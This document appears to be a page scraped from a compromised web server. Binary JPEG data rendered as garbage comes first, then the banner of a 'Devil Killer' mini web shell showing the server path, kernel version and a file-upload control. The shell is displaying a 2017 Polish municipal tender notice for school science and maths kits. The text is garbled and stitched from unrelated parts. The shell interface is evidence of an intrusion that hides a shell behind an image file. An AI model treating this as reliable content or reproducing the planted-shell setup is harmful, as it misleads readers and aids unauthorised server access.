JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170315/43642-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.piekary.pl' target='_blank'>http://www.bip.piekary.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 43642 - 2017
              z dnia 2017-03-15 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Piekary Śląskie: 1: Zakup i dostawa 7 zestawów do eksperymentu  nauki przyrodnicze (wyposażenie pracowni do nauczania metodą eksperymentu w zakresie nauk przyrodniczych/matematyki) dla szkół [...], w ramach projektu Piekarska Akademia Rozwoju dofinansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego  Województwa Śląskiego na lata 2014-2020 (Europejskiego Funduszu Społecznego). 2: Zakup i dostawa 13 zestawów do eksperymentu  nauki przyrodnicze (wyposażenie pracowni do nauczania metodą eksperymentu w zakresie nauk przyrodniczych) dla szkół ... .3: Zakup i dostawa 7 zestawów do eksperymentu  nauki matematyczne (wyposażenie pracowni do nauczania metodą eksperymentu w zakresie nauk przyrodniczych/matematyki) dla szkół ... .4: Opracowanie, wykonanie oraz dostarczenie 357 kompletów materiałów ogólnych z logo unijnym dla uczestników zajęć wyrównawczych z j. obcych, informatyki i matematyki w ramach projektu  Piekarska Akademia Rozwoju... 
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br />Projekt Piekarska Akademia Rozwoju współfinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 -2020,  Oś priorytetowa XI Wzmocnienie potencjału edukacyjnego, Działanie 11.1 Ograniczenie przedwczesnego kończenia nauki szkolnej oraz zapewnienie równego dostępu do dobrej jakości edukacji elementarnej, kształcenia podstawowego i średniego, Poddziałanie 11.1.4. Poprawa efektywności kształcenia ogólnego  konkurs</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Prezydent Miasta  Piekary Śląskie, krajowy numer identyfikacyjny
              , ul.
              ul. Bytomska 
              84,
              41940  
              Piekary Śląskie, woj.
              śląskie, państwo
              Polska, tel.
              323 939 379, e-mail
              um@um.piekary.pl, faks
              32 287 22 69.
              <br />
              Adres strony internetowej (URL): www.bip.piekary.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.piekary.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.piekary.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Urząd Miasta Piekary Śląsie, Ul. Bytomska 84, Biuro Zamówień Publicznych</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>1: Zakup i dostawa 7 zestawów do eksperymentu  nauki przyrodnicze (wyposażenie pracowni do nauczania metodą eksperymentu w zakresie nauk przyrodniczych/matematyki) dla szkół [...], w ramach projektu Piekarska Akademia Rozwoju dofinansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego  Województwa Śląskiego na lata 2014-2020 (Europejskiego Funduszu Społecznego). 2: Zakup i dostawa 13 zestawów do eksperymentu  nauki przyrodnicze (wyposażenie pracowni do nauczania metodą eksperymentu w zakresie nauk przyrodniczych) dla szkół ... .3: Zakup i dostawa 7 zestawów do eksperymentu  nauki matematyczne (wyposażenie pracowni do nauczania metodą eksperymentu w zakresie nauk przyrodniczych/matematyki) dla szkół ... .4: Opracowanie, wykonanie oraz dostarczenie 357 kompletów materiałów ogólnych z logo unijnym dla uczestników zajęć wyrównawczych z j. obcych, informatyki i matematyki w ramach projektu  Piekarska Akademia Rozwoju... 
<br /><b>Numer referencyjny: </b>BZP.271-23/IG/17<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />4<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Szczegółowy opis przedmiotu zamówienia
Część 1 

               
Zestaw do eksperymentu  nauki przyrodnicze (7szt)

Lp.	Nazwa sprzętu	Ilość sztuk	Specyfikacja techniczna
1.	Symulator biegu w przyrodzie	1 szt.	- model wykonany z tworzywa sztucznego, trójwymiarowy,
- funkcjonalny symulator.
- model zawiera: wypukłą wanienkę, pokrywka, pokrywka na chmurę, stojak.
2.	Zestaw doświadczalny gleba	1 szt.	- wyposażony laboratoryjnie (cylindry, szalki, zlewki, pipety, itd.),
- w zestawie karty pracy, 20 doświadczeń wraz z omówieniem dla prowadzącego zajęcia,
- zestaw zawiera kolorowe, foliowane plansze A4,
- zestaw umieszczony w sztywnej walizce.
3.	Medialna baza wiedzy przyroda
	1szt	- wersja dla Szkoły Podstawowej  klasy 4,5,6,
- nośnik CD,
- wersja BOX,
- platforma CD,
- wersja polska.
4.	Globus fizyczny
	1szt	- duży globus fizyczny,
- średnica min. 42 cm.
5.	Kompas
	1szt	- stal wysokogatunkowa,
- średnica tarczy min. 4-5 cm,
- typ: busola soczewkowa do wyznaczania azymutu w terenie.
6.	Mapa fizyczna świata
	1szt	- mapa ścienna,
- dwustronna  fizyczna,
- min. 200 x 140 cm,
- 1:19 000 000.
7.	Szkiełka mikroskopowe
	1szt	- wymiary min. 24x50 mm,
- w zestawie min. 100 szt.
8.	Soczewki
	1szt	- zestaw min. 6 różnych soczewek śr. 50 mm + stojak,
- soczewki umieszczone w drewnianym, zamykanym pudełku z miękkimi przegródkami na każdą soczewkę.

9.	Zwierciadło wklęsłe
	1szt	- przyrząd do obserwacji obrazu rzeczywistego w zwierciadle wklęsłym,
- średnica min. 22 cm.

10.	Pryzmat
	1szt	- szklany,
- równoboczny, min. 38 mm.
11.	Odczynniki
	1 komplet	Zestaw odczynników składający się z:
- tiosiarczan sodu czysty min. 1kg,
- wodorotlenek wapnia czysty min. 250g,
- chlorek żelaza min. 500g.
12.	Mobilny stojak na mapy
	1szt	- bardzo lekka, aluminiowa, solidna konstrukcja,
- wyposażony w kółka.
13.	Pierścień Grawensanda
	1szt	Zestaw zawiera:
- metalowy pierścień z rączką,
- kulka (z tego samego metalu) z rączką o średnicy mniejszej od wewnętrznej średnicy pierścienia.
14.	Stoper
	1szt	- elektroniczny,
- wyświetlacza jednoliniowy,
- wodoodporny,
- alarm,
- zegar,
- kalendarz,
- dokładność nie gorsza niż.: 1/100s.
15	Termometr cieczowy
	1szt	- termometr ze skalą min. -30 do 110 st. C,
- obudowa, z min.6 kolorowymi suwakami,
- termometr można wyjąć z obudowy.
16	Kolby stożkowe
	1szt	- pojemność min. 200 ml,
- wąska szyjka (biokrzemian.).
17	Fartuchy
	5szt	- fartuch laboratoryjny,
- z wysokiej jakości materiału, z trwałej tkaniny poliestrowo -  bawełnianej z wykończeniem wodo i plamoodpornym,
- wyposażony w ściągacze na końcach rękawów.
18	Klucze do oznaczania roślin
	1 zestaw	Zestaw kluczy składa się z następujących pozycji:
- atlas i klucz. Rośliny zielne i krzewiki Polskiem
- przewodnik do oznaczania zbiorowisk roślinnych Polski  karta pozycji,
- klucz do oznaczania roślin naczyniowych Polski niżowej.
lub równoważne
19	Programy interaktywne
	1szt	- wersja dla Szkoły Podstawowej  klasy 4,5,6,
- pakiet zawiera min. 5 płyt CD-ROM,
- dla klas podstawowych 4-6,program do nauki przyrody
20	Laboratorium do hodowli kwiatów
	1szt	- zestaw zawiera min. 3 przeźroczyste rurki, wykonane z trwałego tworzywa,
- zestaw służyć będzie do obserwacji roślin, w tym korzeni,
- min. 3 podstawy do pojemników.
21	Kamera
	1szt	- ekran o rozmiarze min. 2,
- maksymalna jakość zdjęć min. 12 mega pikseli,
- nagranie wideo  w trybie min. 20 klatek na sekundę,
- pamięć wewnętrzna min. 64 MB, z możnością rozszerzenia do min. 2 GB,
- ładowana bateria.
lub równoważne
22	Mikroskop
	1szt	- wys. min. 30 cm  szuflada na preparaty,
- powiększenie do min. 400,
- wbudowana lampka LED,
- zdejmowana głowica,
- wymaga 3 baterii AAA
lub równoważne
23	Termometr cieczowy	1szt	- termometr ze skalą min.-30 do 110 st. C,
- obudowa, z min.6 kolorowymi suwakami,
- termometr można wyjąć z obudowy.
24	Model ucha	1szt	- duży,
- sześcioczęściowy,
- wykonany z tworzywa sztucznego,
- na podstawce,
- wymiary min.: wysokość  24 cm, długość  36 cm, szerokość  19 cm.

25	Peryskop

	1szt	- przyrząd optyczny,
- regulowana długość: min. od 20,5 do 39,5 cm.
- wykonany z trwałego tworzywa.
26	Małe obserwatorium glebowe	1szt	Zestaw składa się z:
- pojemnik z tworzywa,
- wentylowana pokrywka,
- stopki,
- 4 opakowania kolorowego granulatu,
- instrukcja.
27	Kompozycja zwierzęca	1 zestaw	Zestaw gospodarski zwierząt, składający się z:
- duże figury zwierząt,
- min. 7 sztuk,
- wykonane z trwałego tworzywa.

28	Siłomierz
	1szt	- dynamometr (siłomierz),
- wykonany w trwałej metalowej obudowie  10N.
29	Preparaty mikroskopijne protistów	1szt	- grzyby i glony pod mikroskopem,
- min. 10 preparatów mikroskopijnych w pudełku,
- zapakowane w solidne pudełko.
30	Mapa topograficzna miasta	1szt	- plan miasta Bytom, Piekary Śląskie, Radzionków,
- skala: 1:20 000.
31	Stacja metrologiczna	1szt	- przeznaczona do kontroli i obserwacji podstawowych parametrów klimatycznych, temperatury powietrza,
- do mierzenia: powietrza, prędkości wiatru, kierunek wiatru,
- długość min. 116 cm.

32	Model serca
	1szt	- model/rozmiar rzeczywisty,
- zamontowany na stojaku, z którego można go ściągnąć.
- wykonany z tworzywa sztucznego.

33	Miernik elektroniczny	1szt	- uniwersalny,
- posiada następujące funkcje pomiaru: napięcia prądu przemiennego, napięcia prądu stałego, wartość prądu stałego, rezystancji, pomiar diody, tester baterii 1,5V, 9V.
34	Zestaw do ćwiczeń optycznych	1 zestaw	- ława optyczna z wyposażeniem min. podstawowym,
- długość min. 1 m (100cm),
- w skład ławy wchodzą min. następujące elementy: lampa optyczna, uchwyt soczewki, soczewka obustronnie wypukła x 3szt, soczewka płasko  wypukła, uchwyt ekranu, ekran biały, ekran szklany matowy, przesłona I.
35	Waga laboratoryjna	1szt	- zakres ważenia min. 10 000g z dokładnością nie gorsza niż 0,1g,
- powierzchnia ważenia oraz szalka wykonane są ze stali szlachetnej,
- powierzchnia platformy  min. 18x18 cm,
- waga posiadająca funkcję zliczania,
- zasilanie zarówno z baterii oraz sieci.
36	Akwarium do hodowli roślin	1szt	- szklane,
- pojemność min. 112 l.,
- wymiary min.: 80x35x40 cm.


Część 2 

Zestaw do prowadzenia zajęć w ramach koła przyrodniczego (13szt)
Lp.	Nazwa sprzętu	Ilość sztuk	Specyfikacja techniczna
1.	Fartuch	6 szt.	- fartuch laboratoryjny,
- z wysokiej jakości materiału, z trwałej tkaniny poliestrowo -  bawełnianej z wykończeniem wodo i plamoodpornym,
- wyposażony w ściągacze na końcach rękawów.
2.	Zestaw balonów lateksowych - kolorowe 100 sztuk	10 kompletów	- lateksowe,
- różnokolorowe,
- średnica min. 35cm,
- w komplecie min. 100 szt.
3.	Szkiełka mikroskopowe	5 kompletów	- wymiary min. 24x50 mm,
- w zestawie min. 100 szt.
4.	Nagietek lekarski nasiona	10 szt	- waga min. 0,3g.

5.	Aster Alpejski nasiona	10 szt	- waga min. 0,4g.

6.	Aster Chiński nasiona	10 szt	- waga min. 0,4g.

7.	Sól
	1szt	- waga min. 1 kg.
8.	Druk nawojowy miedziany 
	1 szt.	- drut miedziany miedziany,
- długość min. 22m.
- średnica min. 2,50 mm,
- waga min. 1kg.

9.	Srebrzanka drut miedziany srebrzony	10 szt	- grubość min. 0,8 mm.
- 1 metr

10.	Chlorek żelaza	2szt	- waga min. 500 g.

11.	Tiosiarczan sodu	2szt	- czysty,
- waga min. 1kg.

12.	Ziarna grochu
	1szt	- waga min. 400g.
13.	Ziarna fasoli -Piękny Jaś
	1szt	- waga min. 400g.
14.	Torf ogrodniczy (kwaśny
	1szt	- waga min. 20l.

15	Podłoże do siewu i pikowania
	1szt	- waga min. 20l.
16	Podłoże uniwersalne	1 szt.	- waga min. 50l
17	Wodorotlenek wapnia
	2szt	- czysty,
- waga min. 250g.
18	Chlorek magnezu
	2szt	- sześciowodny,
- waga min. 1kg.
19	Chlorek potasu
	2szt	- min. 99% potasowy,
- waga min. 1kg.

20	Rękawiczki lateksowe	1 komplet	- bezpudrowe,
- lateksowe,
- w komplecie min. 100 szt.

Część 3 

Zestaw do eksperymentu  nauki matematyczne (7szt)

Lp.	Nazwa sprzętu	Ilość sztuk	Specyfikacja techniczna
1.	Duży czytelny zegar tarczowy	1 szt.	- magnetyczny zegar demonstracyjny  śr. min. 41 cm,
- wykonany z tworzywa sztucznego,
- cztery mocne wbudowane magnesy.
2.	Geoplan	1 szt.	- dwustronny,
- wykonany z trwałego, mocnego tworzywa,
- w komplecie gumeczki do ćwiczeń.
3.	Liczydło	1 szt.	- wyposażone w min. 10 rzędów z kolorowymi kulkami,
- wykonane z solidnego materiału.
4.	Klocki sześcienne
	1 zestaw	- zestaw zawiera min. 8 otwieranych brył geometrycznych wykonanych z przeźroczystego plastiku,
- zestaw zawiera: walec, stożek, sześcian, prostopadłościan, graniastosłup trójkątny, graniastosłup sześciokątny, czworościan, ostrosłup o podstawie kwadratu.
5.	Bryły magnetyczne	1 zestaw	- zestaw składa się z min. 8 brył magnetycznych: 4 kule o średnicy min. 7,6 cm i 4 sześciany o boku 7,6 cm,
- pudełko i podstawa do przechowywania,
- bryły wykonane z wytrzymałego tworzywa.
6.	Klocki geometryczne	1 zestaw	- zestaw składa się z: siedmiu różnych figur geometrycznych o długości boków min. 7  10 cm,
- wykonane z bezpiecznego i trwałego tworzywa.
7.	Wagi laboratoryjne	2 szt.	- zakres ważenia min. 7500g z dokładnością min. 0,1g,
- powierzchnia ważenia oraz szalka wykonane są ze stali szlachetnej,
- powierzchnia platformy  min. 18x18 cm,
- waga posiadająca funkcję zliczania,
- zasilanie zarówno z baterii oraz sieci.
8.	Zestaw do nauki tabliczki mnożenia	1 szt.	- tuba Pitagorasa tabliczka mnożenia nauka.

9.	Zestaw do mierzenia, liczenia i klasyfikacji	1 zestaw	zestaw składa się z:
- zestawu min. 60 figur do klasyfikacji klocki różnią się od siebie kolorem, kształtem, wielkością i grubością,
- zestawu liczmanów kolorowych, 250 szt, 6 kolorów, średnica krążka min. 19mm.

10.	Puzzle 3D	1 zestaw	- zestaw składa się z 4 różnych zestawów puzzli 3D: 216 el. latarnia morska w nocy, 66 el. Wieża Eiffla Paryż, 216 el. Krzywa Wieża Piza, 540 el. Kula Ziemska.
11.	Kalkulator	1 szt.	- duży, dwunastopozycyjny wyświetlacz,
- biurowy, podręczny,
- podwójne zasilanie.
12.	Cyrkle/ przybory geometryczne	1 zestaw	- zestaw geometryczny, min. 10  elementowy w metalowym pudełku zawierający: cyrkiel na grafity, cyrkiel z uniwersalnym uchwytem, linijkę,
2 ekierki, kątomierz, gumkę, ołówek, grafity, temperówkę.

13.	Modele brył obrotowych	1 zestaw	- zestaw zawiera min. 6 brył geometrycznych: walec z zaznaczonymi, przekątnymi i wysokością, walec z płaszczyznami, stożek z zaznaczonymi przekątnymi i wysokością, stożek z płaszczyznami, kula z płaszczyznami, przekrojem i promieniem, kula z przekątnymi,
- wysokość brył min.: 17 cm.
14.	Domino matematyczne	1 szt	- zestaw zawiera min. 4 układanki (komplety domina),
- każdy zestaw zawiera min. 24 kostki domina (8 x 4cm),
- wykonane z grubego tworzywa,
- w pudełkach.
15.	Przyrządy do nauki o zbiorach i okręgach	1 zestaw	- zestaw składa się z: 
Okręgi  zbiory, komplet min. 15 sztuk plastikowych, składanych okręgów, średnica okręgów min. 25cm, min. 3 kolory (min. po 5 sztuk każdego).
Liczmany kolorowe owoce, 108 sztuk w wiaderku.
16.	Linijka i ekierki magnetyczne	1 zestaw	- linijka, magnetyczna, długość 100c0m,
- ekierka tablicowa, magnetyczna, 45x45x90cm,
17.	Gra bingo	1 szt	- gra planszowa Bingo, Lotto.
18.	Tabliczka mnożenia	1 szt	- drewniana
- wymiary min. 21cm x 21cm
-składająca się z min. 81 elementów, gdzie na 1 stronie znajduje się działanie  a z drugiej rozwiązanie
19.	Zestaw do mierzenia jednostek i objętości	1 zestaw	- zestaw składa się z:
Kompletu min. 5 klepsydr małych, wys. min. 9 cm,
Odważników 1-5-10-20 gramowych, min. 76 szt,
Waga ze zbiornikami min. 0,5  litrowymi,
Pojemniki do pomiaru objętości, komplet 6 pojemników, wysokość 11cm.



Część 4 

W ramach zadania zostanie opracowanie, zakupione i dostarczone 357 kompletów materiałów ogólnych z logo unijnym składających  się z: segregatora  w twardej oprawie format A4, zeszyt (format A4, min 64 kart. w kratkę)  i długopisu w metalowej oprawie. oznaczone zgodnie z aktualnymi Wytycznymi dotyczącymi oznaczania projektu  w ramach Programu Operacyjnego Kapitał Ludzki. Na segregatorze, zeszycie i długopisie muszą  być umieszczone oznaczenia projektu zgodne z dokumentem Podręcznik wnioskodawcy    i beneficjenta programów polityki spójności 2014-2020 w zakresie informacji i promocji.  Na długopisie oznaczenia z logami unijnymi w negatywie.
Zleceniodawca musi zaakceptować opracowanie graficzne materiałów, które przekaże przed wykonaniem przedmiotu umowy Wykonawca. 
Wykonawca dostarczy komplety do Biura Projektu Piekarska Akademia Rozwoju, ul. Bytomska 84, pokój 216.
Wykonawca zobowiązany jest wykonać przedmiot umowy w terminie wskazanym w ofercie, maksymalnie do 14 dni od dnia podpisania umowy.

2.Kod i nazwa zamówienia według Wspólnego Słownika Zamówień ( CPV)

39162000-5  Pomoce naukowe,
39162100-6  Pomoce dydaktyczne,
 
3. Rozwiązania równoważne. Wskazane w SIWZ i dokumentach technicznych znaki towarowe, patenty lub pochodzenie, źródło lub szczególny proces, który charakteryzuje dany produkt są uzasadnione specyfiką przedmiotu zamówienia i mają na celu wskazanie jedynie jakości i parametrów przedmiotu  zamówienia z uwagi na brak innych dostatecznie dokładnych określeń, które pozwalałyby opisać przedmiot zamówienia w tej części w sposób jednoznaczny i wyczerpujący równocześnie opisując przedmiot zamówienia  przez odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, Zamawiający jest obowiązany wskazać, że dopuszcza rozwiązania równoważne opisywanym, a odniesieniu takiemu towarzyszą wyrazy lub równoważne. W związku z powyższym Wykonawcy mogą składać oferty równoważne w stosunku do przedmiotu zamówienia przedstawionego w SIWZ  zgodnie z art. 30 ust. 5 Ustawy. 
W związku z tym:

1) Zamawiający dopuszcza zastosowanie materiałów i urządzeń równoważnych  tj.                                o parametrach    technicznych i jakościowych nie gorszych niż określone w SIWZ  
2)  Zamawiający dopuszcza zastosowanie rozwiązań równoważnych w stosunku do rozwiązań  określonych w SIWZ, a wskazanych poprzez normy, oceny techniczne, aprobaty,  specyfikacje techniczne i systemy referencji technicznych.
